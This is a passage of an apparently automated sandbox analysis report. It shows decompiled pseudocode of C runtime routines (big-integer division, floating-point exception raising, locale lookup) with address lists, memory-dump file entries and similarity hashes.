                    												if(_t263 > 0xffffffff) {
                    													goto L40;
                    												}
                    											}
                    											__eflags = 0;
                    											if(0 <= 0) {
                    												if(0 < 0) {
                    													goto L44;
                    												} else {
                    													__eflags = _t333 - 0xffffffff;
                    													if(_t333 <= 0xffffffff) {
                    														while(1) {
                    															L44:
                    															_v8 = _v24;
                    															_t228 = E013F2820(_v36, 0, _t263, _t209);
                    															__eflags = _t311 - _t333;
                    															if(__eflags < 0) {
                    																break;
                    															}
                    															if(__eflags > 0) {
                    																L47:
                    																_t209 = _v28;
                    																_t263 = _t263 + 0xffffffff;
                    																_v72 = _t263;
                    																asm("adc eax, 0xffffffff");
                    																_t333 = _t333 + _v56;
                    																__eflags = _t333;
                    																_v28 = _t209;
                    																asm("adc dword [ebp-0x28], 0x0");
                    																_v68 = _t209;
                    																if(_t333 == 0) {
                    																	__eflags = _t333 - 0xffffffff;
                    																	if(_t333 <= 0xffffffff) {
                    																		continue;
                    																	} else {
                    																	}
                    																}
                    															} else {
                    																__eflags = _t228 - _v8;
                    																if(_t228 <= _v8) {
                    																	break;
                    																} else {
                    																	goto L47;
                    																}
                    															}
                    															L51:
                    															_v8 = _t263;
                    															goto L52;
                    														}
                    														_t209 = _v28;
                    														goto L51;
                    													}
                    												}
                    											}
                    											L52:
                    											__eflags = _t209;
                    											if(_t209 != 0) {
                    												L54:
                    												_t280 = _v60;
                    												_t334 = 0;
                    												_t355 = 0;
                    												__eflags = _t280;
                    												if(_t280 != 0) {
                    													_t266 = _v20;
                    													_t219 =  &(_a8[1]);
                    													__eflags = _t219;
                    													_v24 = _t219;
                    													_v16 = _t280;
                    													do {
                    														_v44 =  *_t219;
                    														_t225 =  *_t266;
                    														_t286 = _t334 + _v72 * _v44;
                    														asm("adc esi, edx");
                    														_t334 = _t355;
                    														_t355 = 0;
                    														__eflags = _t225 - _t286;
                    														if(_t225 < _t286) {
                    															_t334 = _t334 + 1;
                    															asm("adc esi, esi");
                    														}
                    														 *_t266 = _t225 - _t286;
                    														_t266 = _t266 + 4;
                    														_t219 = _v24 + 4;
                    														_t164 =  &_v16;
                    														 *_t164 = _v16 - 1;
                    														__eflags =  *_t164;
                    														_v24 = _t219;
                    													} while ( *_t164 != 0);
                    													_t263 = _v8;
                    													_t280 = _v60;
                    												}
                    												__eflags = 0 - _t355;
                    												if(__eflags <= 0) {
                    													if(__eflags < 0) {
                    														L63:
                    														__eflags = _t280;
                    														if(_t280 != 0) {
                    															_t338 = _t280;
                    															_t314 = _v20;
                    															_t362 =  &(_a8[1]);
                    															__eflags = _t362;
                    															_t265 = 0;
                    															do {
                    																_t282 =  *_t314;
                    																_t172 = _t362 + 4; // 0xa6a5959
                    																_t362 = _t172;
                    																_t314 = _t314 + 4;
                    																asm("adc eax, eax");
                    																 *((intOrPtr*)(_t314 - 4)) = _t282 +  *((intOrPtr*)(_t362 - 4)) + _t265;
                    																asm("adc eax, 0x0");
                    																_t265 = 0;
                    																_t338 = _t338 - 1;
                    																__eflags = _t338;
                    															} while (_t338 != 0);
                    															_t263 = _v8;
                    														}
                    														_t263 = _t263 + 0xffffffff;
                    														asm("adc dword [ebp-0x18], 0xffffffff");
                    													} else {
                    														__eflags = _v52 - _t334;
                    														if(_v52 < _t334) {
                    															goto L63;
                    														}
                    													}
                    												}
                    												_t213 = _v12 - 1;
                    												__eflags = _t213;
                    												_v16 = _t213;
                    											} else {
                    												__eflags = _t263;
                    												if(_t263 != 0) {
                    													goto L54;
                    												}
                    											}
                    											_t331 = 0 + _t263;
                    											asm("adc esi, 0x0");
                    											_v20 = _v20 - 4;
                    											_t313 = _v32 - 1;
                    											_t262 = _a4;
                    											_t278 = _v80 - 4;
                    											_t206 = _v12 - 1;
                    											_v76 = _t331;
                    											_v32 = _t313;
                    											_v80 = _t278;
                    											_v12 = _t206;
                    											__eflags = _t313;
                    										} while (_t313 >= 0);
                    									}
                    									_t309 = _v16 + 1;
                    									_t204 = _t309;
                    									__eflags = _t204 -  *_t262;
                    									if(_t204 <  *_t262) {
                    										_t191 = _t204 + 1; // 0x141371e
                    										_t274 =  &(_t262[_t191]);
                    										do {
                    											 *_t274 = 0;
                    											_t194 =  &(_t274[1]); // 0x91850fc2
                    											_t274 = _t194;
                    											_t204 = _t204 + 1;
                    											__eflags = _t204 -  *_t262;
                    										} while (_t204 <  *_t262);
                    									}
                    									 *_t262 = _t309;
                    									__eflags = _t309;
                    									if(_t309 != 0) {
                    										while(1) {
                    											_t271 =  *_t262;
                    											__eflags = _t262[_t271];
                    											if(_t262[_t271] != 0) {
                    												goto L78;
                    											}
                    											_t272 = _t271 + 0xffffffff;
                    											__eflags = _t272;
                    											 *_t262 = _t272;
                    											if(_t272 != 0) {
                    												continue;
                    											}
                    											goto L78;
                    										}
                    									}
                    									L78:
                    									return _t331;
                    								} else {
                    									goto L23;
                    								}
                    							}
                    						} else {
                    							_t6 =  &(_t328[1]); // 0xfc23b5a
                    							_t295 =  *_t6;
                    							_v44 = _t295;
                    							__eflags = _t295 - 1;
                    							if(_t295 != 1) {
                    								__eflags = _t349;
                    								if(_t349 != 0) {
                    									_t342 = 0;
                    									_v12 = 0;
                    									_v8 = 0;
                    									_v20 = 0;
                    									__eflags = _t349 - 0xffffffff;
                    									if(_t349 != 0xffffffff) {
                    										_t250 = _v16 + 1;
                    										__eflags = _t250;
                    										_v32 = _t250;
                    										_t373 =  &(_t262[_t349 + 1]);
                    										do {
                    											_t253 = E013F3170( *_t373, _t342, _t295, 0);
                    											_v68 = _t303;
                    											_t373 = _t373 - 4;
                    											_v20 = _t262;
                    											_t342 = _t295;
                    											_t303 = 0 + _t253;
                    											asm("adc ecx, 0x0");
                    											_v12 = _t303;
                    											_t34 =  &_v32;
                    											 *_t34 = _v32 - 1;
                    											__eflags =  *_t34;
                    											_v8 = _v12;
                    											_t295 = _v44;
                    										} while ( *_t34 != 0);
                    										_t262 = _a4;
                    									}
                    									_v544 = 0;
                    									_t41 =  &(_t262[1]); // 0x4
                    									_t370 = _t41;
                    									 *_t262 = 0;
                    									E0141394B(_t370, 0x1cc,  &_v540, 0);
                    									_t247 = _v20;
                    									__eflags = 0 - _t247;
                    									 *_t370 = _t342;
                    									_t262[2] = _t247;
                    									asm("sbb ecx, ecx");
                    									__eflags =  ~0x00000000;
                    									 *_t262 = 0xbadbae;
                    									return _v12;
                    								} else {
                    									_t14 =  &(_t262[1]); // 0x4
                    									_t344 = _t14;
                    									_v544 = 0;
                    									 *_t262 = 0;
                    									E0141394B(_t344, 0x1cc,  &_v540, 0);
                    									_t256 = _t262[1];
                    									_t322 = _t256 % _v44;
                    									__eflags = 0 - _t322;
                    									 *_t344 = _t322;
                    									asm("sbb ecx, ecx");
                    									__eflags = 0;
                    									 *_t262 =  ~0x00000000;
                    									return _t256 / _v44;
                    								}
                    							} else {
                    								_t9 =  &(_t262[1]); // 0x4
                    								_v544 = _t198;
                    								 *_t262 = _t198;
                    								E0141394B(_t9, 0x1cc,  &_v540, _t198);
                    								__eflags = 0;
                    								return _t262[1];
                    							}
                    						}
                    					} else {
                    						__eflags = 0;
                    						return 0;
                    					}
                    				} else {
                    					return _t197;
                    				}
                    			}























































































                    0x0140142c
                    0x0140142f
                    0x01401433
                    0x0140143d
                    0x01401440
                    0x01401442
                    0x01401444
                    0x01401451
                    0x01401451
                    0x01401454
                    0x01401454
                    0x01401457
                    0x0140145a
                    0x0140145c
                    0x0140158f
                    0x01401591
                    0x014015da
                    0x014015de
                    0x014015e4
                    0x01401593
                    0x01401595
                    0x01401598
                    0x0140159a
                    0x0140159d
                    0x0140159f
                    0x014015a1
                    0x014015d5
                    0x014015d5
                    0x014015d5
                    0x014015a3
                    0x014015a8
                    0x014015ae
                    0x014015ae
                    0x014015b1
                    0x014015b3
                    0x014015b5
                    0x00000000
                    0x00000000
                    0x014015b7
                    0x014015b8
                    0x014015bb
                    0x014015be
                    0x014015c0
                    0x00000000
                    0x014015c2
                    0x00000000
                    0x014015c2
                    0x00000000
                    0x014015c0
                    0x014015c4
                    0x014015cb
                    0x014015cf
                    0x014015d3
                    0x00000000
                    0x00000000
                    0x014015d3
                    0x014015d6
                    0x014015d6
                    0x014015d8
                    0x014015e5
                    0x014015e8
                    0x014015eb
                    0x014015ee
                    0x014015ee
                    0x014015f2
                    0x014015f5
                    0x014015f8
                    0x014015fb
                    0x01401606
                    0x014015fd
                    0x01401602
                    0x01401602
                    0x01401610
                    0x01401615
                    0x01401618
                    0x0140161a
                    0x01401624
                    0x01401627
                    0x0140162e
                    0x01401631
                    0x01401634
                    0x0140163c
                    0x01401642
                    0x01401642
                    0x01401642
                    0x01401642
                    0x01401634
                    0x01401647
                    0x0140164e
                    0x0140164e
                    0x01401651
                    0x01401654
                    0x01401886
                    0x01401886
                    0x0140165a
                    0x0140165a
                    0x01401660
                    0x01401663
                    0x01401666
                    0x01401669
                    0x0140166c
                    0x0140166f
                    0x01401672
                    0x01401672
                    0x01401675
                    0x0140167c
                    0x0140167c
                    0x01401677
                    0x01401677
                    0x01401677
                    0x0140167e
                    0x01401682
                    0x01401685
                    0x01401687
                    0x0140168a
                    0x01401691
                    0x01401694
                    0x01401697
                    0x014016a2
                    0x014016a5
                    0x014016aa
                    0x014016af
                    0x014016b6
                    0x014016bb
                    0x014016bd
                    0x014016bf
                    0x014016c3
                    0x014016c6
                    0x014016c9
                    0x014016d1
                    0x014016da
                    0x014016da
                    0x014016dc
                    0x014016df
                    0x014016df
                    0x014016c9
                    0x014016e9
                    0x014016ee
                    0x014016f3
                    0x014016f5
                    0x014016f8
                    0x014016fa
                    0x014016fd
                    0x01401700
                    0x01401702
                    0x01401705
                    0x01401708
                    0x0140170a
                    0x01401711
                    0x01401716
                    0x01401719
                    0x01401723
                    0x01401725
                    0x01401727
                    0x0140172a
                    0x0140172a
                    0x0140172c
                    0x0140172f
                    0x01401732
                    0x01401735
                    0x01401738
                    0x0140170c
                    0x0140170c
                    0x0140170f
                    0x00000000
                    0x00000000
                    0x0140170f
                    0x0140173b
                    0x0140173d
                    0x0140173f
                    0x00000000
                    0x01401741
                    0x01401741
                    0x01401744
                    0x01401746
                    0x01401746
                    0x01401754
                    0x01401757
                    0x0140175c
                    0x0140175e
                    0x00000000
                    0x00000000
                    0x01401760
                    0x01401767
                    0x01401767
                    0x0140176a
                    0x0140176d
                    0x01401770
                    0x01401773
                    0x01401773
                    0x01401776
                    0x01401779
                    0x0140177d
                    0x01401780
                    0x01401782
                    0x01401785
                    0x00000000
                    0x00000000
                    0x01401787
                    0x01401785
                    0x01401762
                    0x01401762
                    0x01401765
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x01401765
                    0x0140178c
                    0x0140178c
                    0x00000000
                    0x0140178c
                    0x01401789
                    0x00000000
                    0x01401789
                    0x01401744
                    0x0140173f
                    0x0140178f
                    0x0140178f
                    0x01401791
                    0x0140179b
                    0x0140179b
                    0x0140179e
                    0x014017a0
                    0x014017a2
                    0x014017a4
                    0x014017a9
                    0x014017ac
                    0x014017ac
                    0x014017af
                    0x014017b2
                    0x014017b5
                    0x014017b7
                    0x014017cc
                    0x014017ce
                    0x014017d0
                    0x014017d2
                    0x014017d4
                    0x014017d6
                    0x014017d8
                    0x014017da
                    0x014017dd
                    0x014017dd
                    0x014017e1
                    0x014017e3
                    0x014017e9
                    0x014017ec
                    0x014017ec
                    0x014017ec
                    0x014017f0
                    0x014017f0
                    0x014017f5
                    0x014017f8
                    0x014017f8
                    0x014017fd
                    0x014017ff
                    0x01401801
                    0x01401808
                    0x01401808
                    0x0140180a
                    0x0140180f
                    0x01401811
                    0x01401814
                    0x01401814
                    0x01401817
                    0x01401820
                    0x01401820
                    0x01401822
                    0x01401822
                    0x01401827
                    0x0140182d
                    0x01401831
                    0x01401834
                    0x01401837
                    0x01401839
                    0x01401839
                    0x01401839
                    0x0140183e
                    0x0140183e
                    0x01401841
                    0x01401844
                    0x01401803
                    0x01401803
                    0x01401806
                    0x00000000
                    0x00000000
                    0x01401806
                    0x01401801
                    0x0140184b
                    0x0140184b
                    0x0140184c
                    0x01401793
                    0x01401793
                    0x01401795
                    0x00000000
                    0x00000000
                    0x01401795
                    0x0140185c
                    0x01401861
                    0x01401864
                    0x01401868
                    0x01401869
                    0x0140186c
                    0x0140186f
                    0x01401870
                    0x01401873
                    0x01401876
                    0x01401879
                    0x0140187c
                    0x0140187c
                    0x01401884
                    0x0140188b
                    0x0140188c
                    0x0140188e
                    0x01401890
                    0x01401892
                    0x01401895
                    0x014018a0
                    0x014018a0
                    0x014018a6
                    0x014018a6
                    0x014018a9
                    0x014018aa
                    0x014018aa
                    0x014018a0
                    0x014018ae
                    0x014018b0
                    0x014018b2
                    0x014018b4
                    0x014018b4
                    0x014018b6
                    0x014018ba
                    0x00000000
                    0x00000000
                    0x014018bc
                    0x014018bc
                    0x014018bf
                    0x014018c1
                    0x00000000
                    0x00000000
                    0x00000000
                    0x014018c1
                    0x014018b4
                    0x014018c3
                    0x014018cd
                    0x00000000
                    0x00000000
                    0x00000000
                    0x014015d8
                    0x01401462
                    0x01401462
                    0x01401462
                    0x01401465
                    0x01401468
                    0x0140146b
                    0x0140149c
                    0x0140149e
                    0x014014e9
                    0x014014eb
                    0x014014f2
                    0x014014f9
                    0x014014fc
                    0x014014ff
                    0x01401505
                    0x01401505
                    0x01401506
                    0x01401509
                    0x01401510
                    0x01401519
                    0x0140151e
                    0x01401521
                    0x01401526
                    0x01401529
                    0x0140152b
                    0x01401530
                    0x01401533
                    0x01401536
                    0x01401536
                    0x01401536
                    0x0140153a
                    0x0140153d
                    0x0140153d
                    0x01401542
                    0x01401542
                    0x0140154d
                    0x01401558
                    0x01401558
                    0x0140155b
                    0x01401567
                    0x0140156c
                    0x01401577
                    0x01401579
                    0x0140157b
                    0x01401581
                    0x01401586
                    0x01401588
                    0x0140158e
                    0x014014a0
                    0x014014ac
                    0x014014ac
                    0x014014af
                    0x014014bf
                    0x014014c5
                    0x014014cc
                    0x014014ce
                    0x014014d6
                    0x014014d8
                    0x014014da
                    0x014014df
                    0x014014e2
                    0x014014e8
                    0x014014e8
                    0x0140146d
                    0x01401470
                    0x01401474
                    0x0140147a
                    0x01401489
                    0x01401493
                    0x0140149b
                    0x0140149b
                    0x0140146b
                    0x01401446
                    0x01401449
                    0x0140144f
                    0x0140144f
                    0x01401435
                    0x0140143b
                    0x0140143b

                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a7c3c6b2e0b53cc832c6b9d60aa2e018ed42548eddb90d928b64b7a2ec8cc815
                    • Instruction ID: 57c5e55be92c3a1f34c3da441fd1f6312f0aa70a07adda6e641b83411be6916f
                    • Opcode Fuzzy Hash: a7c3c6b2e0b53cc832c6b9d60aa2e018ed42548eddb90d928b64b7a2ec8cc815
                    • Instruction Fuzzy Hash: E2023E71E001199BDF15CFADC9806AEBBF1FF48724F19416AD919E7391D731AA41CB80
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E014043D9(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
                    				signed int _t172;
                    				signed int _t175;
                    				signed int _t178;
                    				signed int* _t179;
                    				signed int _t195;
                    				signed int _t199;
                    				signed int _t202;
                    				void* _t203;
                    				void* _t206;
                    				signed int _t209;
                    				void* _t210;
                    				signed int _t225;
                    				unsigned int* _t240;
                    				signed char _t242;
                    				signed int* _t250;
                    				unsigned int* _t256;
                    				signed int* _t257;
                    				signed char _t259;
                    				long _t262;
                    				signed int* _t265;
                    
                    				 *(_a4 + 4) = 0;
                    				_t262 = 0xc000000d;
                    				 *(_a4 + 8) = 0;
                    				 *(_a4 + 0xc) = 0;
                    				_t242 = _a12;
                    				if((_t242 & 0x00000010) != 0) {
                    					_t262 = 0xc000008f;
                    					 *(_a4 + 4) =  *(_a4 + 4) | 1;
                    				}
                    				if((_t242 & 0x00000002) != 0) {
                    					_t262 = 0xc0000093;
                    					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
                    				}
                    				if((_t242 & 0x00000001) != 0) {
                    					_t262 = 0xc0000091;
                    					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
                    				}
                    				if((_t242 & 0x00000004) != 0) {
                    					_t262 = 0xc000008e;
                    					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                    				}
                    				if((_t242 & 0x00000008) != 0) {
                    					_t262 = 0xc0000090;
                    					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
                    				}
                    				_t265 = _a8;
                    				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 << 4) ^  *(_a4 + 8)) & 0x00000010;
                    				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 +  *_t265) ^  *(_a4 + 8)) & 0x00000008;
                    				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 1) ^  *(_a4 + 8)) & 0x00000004;
                    				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 3) ^  *(_a4 + 8)) & 0x00000002;
                    				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 5) ^  *(_a4 + 8)) & 1;
                    				_t259 = E0140A7DB(_a4);
                    				if((_t259 & 0x00000001) != 0) {
                    					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
                    				}
                    				if((_t259 & 0x00000004) != 0) {
                    					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
                    				}
                    				if((_t259 & 0x00000008) != 0) {
                    					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
                    				}
                    				if((_t259 & 0x00000010) != 0) {
                    					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
                    				}
                    				if((_t259 & 0x00000020) != 0) {
                    					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
                    				}
                    				_t172 =  *_t265 & 0x00000c00;
                    				if(_t172 == 0) {
                    					 *_a4 =  *_a4 & 0xfffffffc;
                    				} else {
                    					if(_t172 == 0x400) {
                    						_t257 = _a4;
                    						_t225 =  *_t257 & 0xfffffffd | 1;
                    						L26:
                    						 *_t257 = _t225;
                    						L29:
                    						_t175 =  *_t265 & 0x00000300;
                    						if(_t175 == 0) {
                    							_t250 = _a4;
                    							_t178 =  *_t250 & 0xffffffeb | 0x00000008;
                    							L35:
                    							 *_t250 = _t178;
                    							L36:
                    							_t179 = _a4;
                    							_t254 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
                    							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
                    							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
                    							if(_a28 == 0) {
                    								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
                    								 *((long long*)(_a4 + 0x10)) =  *_a20;
                    								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
                    								_t254 = _a4;
                    								_t240 = _a24;
                    								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
                    								 *(_a4 + 0x50) =  *_t240;
                    							} else {
                    								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
                    								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
                    								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
                    								_t240 = _a24;
                    								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
                    								 *(_a4 + 0x50) =  *_t240;
                    							}
                    							E0140A741(_t254);
                    							RaiseException(_t262, 0, 1,  &_a4);
                    							_t256 = _a4;
                    							if((_t256[2] & 0x00000010) != 0) {
                    								 *_t265 =  *_t265 & 0xfffffffe;
                    							}
                    							if((_t256[2] & 0x00000008) != 0) {
                    								 *_t265 =  *_t265 & 0xfffffffb;
                    							}
                    							if((_t256[2] & 0x00000004) != 0) {
                    								 *_t265 =  *_t265 & 0xfffffff7;
                    							}
                    							if((_t256[2] & 0x00000002) != 0) {
                    								 *_t265 =  *_t265 & 0xffffffef;
                    							}
                    							if((_t256[2] & 0x00000001) != 0) {
                    								 *_t265 =  *_t265 & 0xffffffdf;
                    							}
                    							_t195 =  *_t256 & 0x00000003;
                    							if(_t195 == 0) {
                    								 *_t265 =  *_t265 & 0xfffff3ff;
                    							} else {
                    								_t206 = _t195 - 1;
                    								if(_t206 == 0) {
                    									_t209 =  *_t265 & 0xfffff7ff | 0x00000400;
                    									L55:
                    									 *_t265 = _t209;
                    									L58:
                    									_t199 =  *_t256 >> 0x00000002 & 0x00000007;
                    									if(_t199 == 0) {
                    										_t202 =  *_t265 & 0xfffff3ff | 0x00000300;
                    										L64:
                    										 *_t265 = _t202;
                    										L65:
                    										if(_a28 == 0) {
                    											 *_t240 = _t256[0x14];
                    										} else {
                    											 *_t240 = _t256[0x14];
                    										}
                    										return _t202;
                    									}
                    									_t203 = _t199 - 1;
                    									if(_t203 == 0) {
                    										_t202 =  *_t265 & 0xfffff3ff | 0x00000200;
                    										goto L64;
                    									}
                    									_t202 = _t203 - 1;
                    									if(_t202 == 0) {
                    										 *_t265 =  *_t265 & 0xfffff3ff;
                    									}
                    									goto L65;
                    								}
                    								_t210 = _t206 - 1;
                    								if(_t210 == 0) {
                    									_t209 =  *_t265 & 0xfffffbff | 0x00000800;
                    									goto L55;
                    								}
                    								if(_t210 == 1) {
                    									 *_t265 =  *_t265 | 0x00000c00;
                    								}
                    							}
                    							goto L58;
                    						}
                    						if(_t175 == 0x200) {
                    							_t250 = _a4;
                    							_t178 =  *_t250 & 0xffffffe7 | 0x00000004;
                    							goto L35;
                    						}
                    						if(_t175 == 0x300) {
                    							 *_a4 =  *_a4 & 0xffffffe3;
                    						}
                    						goto L36;
                    					}
                    					if(_t172 == 0x800) {
                    						_t257 = _a4;
                    						_t225 =  *_t257 & 0xfffffffe | 0x00000002;
                    						goto L26;
                    					}
                    					if(_t172 == 0xc00) {
                    						 *_a4 =  *_a4 | 0x00000003;
                    					}
                    				}
                    			}























                    0x014043e7
                    0x014043ee
                    0x014043f3
                    0x014043f9
                    0x014043fc
                    0x01404402
                    0x01404407
                    0x0140440c
                    0x0140440c
                    0x01404412
                    0x01404417
                    0x0140441c
                    0x0140441c
                    0x01404423
                    0x01404428
                    0x0140442d
                    0x0140442d
                    0x01404434
                    0x01404439
                    0x0140443e
                    0x0140443e
                    0x01404445
                    0x0140444a
                    0x0140444f
                    0x0140444f
                    0x01404457
                    0x01404467
                    0x01404479
                    0x0140448b
                    0x0140449e
                    0x014044b0
                    0x014044b8
                    0x014044bd
                    0x014044c2
                    0x014044c2
                    0x014044c9
                    0x014044ce
                    0x014044ce
                    0x014044d5
                    0x014044da
                    0x014044da
                    0x014044e1
                    0x014044e6
                    0x014044e6
                    0x014044ed
                    0x014044f2
                    0x014044f2
                    0x014044fc
                    0x014044fe
                    0x01404538
                    0x01404500
                    0x01404505
                    0x01404529
                    0x01404531
                    0x01404525
                    0x01404525
                    0x0140453b
                    0x01404542
                    0x01404544
                    0x01404566
                    0x0140456e
                    0x01404571
                    0x01404571
                    0x01404573
                    0x01404573
                    0x0140457e
                    0x01404584
                    0x01404589
                    0x01404590
                    0x014045ca
                    0x014045d5
                    0x014045db
                    0x014045de
                    0x014045e1
                    0x014045ed
                    0x014045f5
                    0x01404592
                    0x01404595
                    0x014045a1
                    0x014045a7
                    0x014045ad
                    0x014045b0
                    0x014045b9
                    0x014045b9
                    0x014045f8
                    0x01404606
                    0x0140460c
                    0x01404613
                    0x01404615
                    0x01404615
                    0x0140461c
                    0x0140461e
                    0x0140461e
                    0x01404625
                    0x01404627
                    0x01404627
                    0x0140462e
                    0x01404630
                    0x01404630
                    0x01404637
                    0x01404639
                    0x01404639
                    0x01404646
                    0x01404649
                    0x01404680
                    0x0140464b
                    0x0140464b
                    0x0140464e
                    0x01404679
                    0x0140466e
                    0x0140466e
                    0x01404682
                    0x0140468a
                    0x0140468d
                    0x014046ac
                    0x014046b1
                    0x014046b1
                    0x014046b3
                    0x014046b8
                    0x014046c4
                    0x014046ba
                    0x014046bd
                    0x014046bd
                    0x014046c9
                    0x014046c9
                    0x0140468f
                    0x01404692
                    0x014046a1
                    0x00000000
                    0x014046a1
                    0x01404694
                    0x01404697
                    0x01404699
                    0x01404699
                    0x00000000
                    0x01404697
                    0x01404650
                    0x01404653
                    0x01404669
                    0x00000000
                    0x01404669
                    0x01404658
                    0x0140465a
                    0x0140465a
                    0x01404658
                    0x00000000
                    0x01404649
                    0x0140454b
                    0x01404559
                    0x01404561
                    0x00000000
                    0x01404561
                    0x0140454f
                    0x01404554
                    0x01404554
                    0x00000000
                    0x0140454f
                    0x0140450c
                    0x0140451a
                    0x01404522
                    0x00000000
                    0x01404522
                    0x01404510
                    0x01404515
                    0x01404515
                    0x01404510

                    APIs
                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,000000FF), ref: 01404606
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: ExceptionRaise
                    • String ID:
                    • API String ID: 3997070919-0
                    • Opcode ID: eec383fff69a6b4eae612d3ce3d5c6fa2a013b90b2e0813ee94e2fedda35dc2c
                    • Instruction ID: 53830a3a8990beb78dd49abd1f2881695a7dc8fd9e0a34ee19e466a147025446
                    • Opcode Fuzzy Hash: eec383fff69a6b4eae612d3ce3d5c6fa2a013b90b2e0813ee94e2fedda35dc2c
                    • Instruction Fuzzy Hash: 64B13A31510608DFE716CF2DC48AB657BA0FF45364F298669EA99CF2E1C335D992CB40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 66%
                    			E0140FAEE(void* __ecx, void* __edx, intOrPtr _a4) {
                    				signed int _v8;
                    				short _v248;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				signed int _t16;
                    				signed int _t22;
                    				void* _t24;
                    				void* _t31;
                    				void* _t33;
                    				void* _t34;
                    				signed int* _t48;
                    				int _t50;
                    				signed int _t51;
                    
                    				_t16 =  *0x1435234; // 0x78d9f939
                    				_v8 = _t16 ^ _t51;
                    				_t34 = E01406A01(_t33, __ecx, __edx);
                    				_t48 =  *(E01406A01(_t34, __ecx, __edx) + 0x34c);
                    				_t50 = E0140FBC6(_a4);
                    				asm("sbb ecx, ecx");
                    				_t22 = GetLocaleInfoW(_t50, ( ~( *(_t34 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78);
                    				if(_t22 != 0) {
                    					_t24 = E0140C591(_t34, _t48, _t50,  *((intOrPtr*)(_t34 + 0x50)),  &_v248);
                    					if(_t24 != 0) {
                    						if( *(_t34 + 0x60) == 0 &&  *((intOrPtr*)(_t34 + 0x5c)) != 0) {
                    							_t31 = E0140C591(_t34, _t48, _t50,  *((intOrPtr*)(_t34 + 0x50)),  &_v248);
                    							if(_t31 == 0) {
                    								_push(_t48);
                    								_push(_t31);
                    								goto L9;
                    							}
                    						}
                    					} else {
                    						if( *(_t34 + 0x60) != _t24) {
                    							L10:
                    							 *_t48 =  *_t48 | 0x00000004;
                    							_t48[1] = _t50;
                    							_t48[2] = _t50;
                    						} else {
                    							_push(_t48);
                    							_push(1);
                    							L9:
                    							_push(_t50);
                    							if(E0140FD1E(_t34) != 0) {
                    								goto L10;
                    							}
                    						}
                    					}
                    					_t28 =  !( *_t48 >> 2) & 0x00000001;
                    				} else {
                    					 *_t48 =  *_t48 & _t22;
                    					_t28 = _t22 + 1;
                    				}
                    				return E013F268B(_t28, _v8 ^ _t51);
                    			}


















                    0x0140faf9
                    0x0140fb00
                    0x0140fb0e
                    0x0140fb16
                    0x0140fb25
                    0x0140fb31
                    0x0140fb42
                    0x0140fb4a
                    0x0140fb5b
                    0x0140fb64
                    0x0140fb74
                    0x0140fb86
                    0x0140fb8f
                    0x0140fb91
                    0x0140fb92
                    0x00000000
                    0x0140fb92
                    0x0140fb8f
                    0x0140fb66
                    0x0140fb69
                    0x0140fba0
                    0x0140fba0
                    0x0140fba3
                    0x0140fba6
                    0x0140fb6b
                    0x0140fb6b
                    0x0140fb6c
                    0x0140fb93
                    0x0140fb93
                    0x0140fb9e
                    0x00000000
                    0x00000000
